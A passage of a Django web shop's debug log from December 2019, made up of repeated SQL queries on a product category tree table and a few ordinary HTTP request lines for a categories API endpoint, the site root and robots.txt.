"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:30:43,603 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:30:43,605 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:30:43,608 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:30:43,610 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:30:43,614 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:30:43,616 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:30:43,618 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:30:43,620 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:30:43,622 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:30:43,624 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:30:43,627 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:30:43,629 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:30:43,632 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:30:43,634 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:30:43,637 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:30:43] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:31:42,713 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:31:42,719 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:31:42,723 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:31:42,726 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:31:42,729 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:31:42,731 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:31:42,734 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:31:42,736 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:31:42,738 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:31:42,741 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:31:42,744 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:31:42,746 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:31:42,749 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:31:42,752 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:31:42,755 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:31:42,758 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:31:42,760 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:31:42,762 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:31:42,765 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:31:42,768 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:31:42,771 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:31:42,773 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:31:42,775 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:31:42,777 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:31:42,780 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:31:42,783 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:31:42,785 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:31:42,787 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:31:42,789 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:31:42,792 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:31:42,795 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:31:42,797 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:31:42,799 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:31:42,802 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:31:42,804 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:31:42,808 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:31:42,811 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:31:42,813 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:31:42,815 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:31:42,817 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:31:42,819 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:31:42,822 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:31:42,824 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:31:42,827 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:31:42,829 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:31:42,832 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:31:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:35:19] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [20/Dec/2019 07:36:06] "GET /robots.txt HTTP/1.0" 404 6453 DEBUG 2019-12-20 07:36:06,848 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:36:06,859 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:36:06,866 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:36:06,871 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:36:06,880 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:36:06,886 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 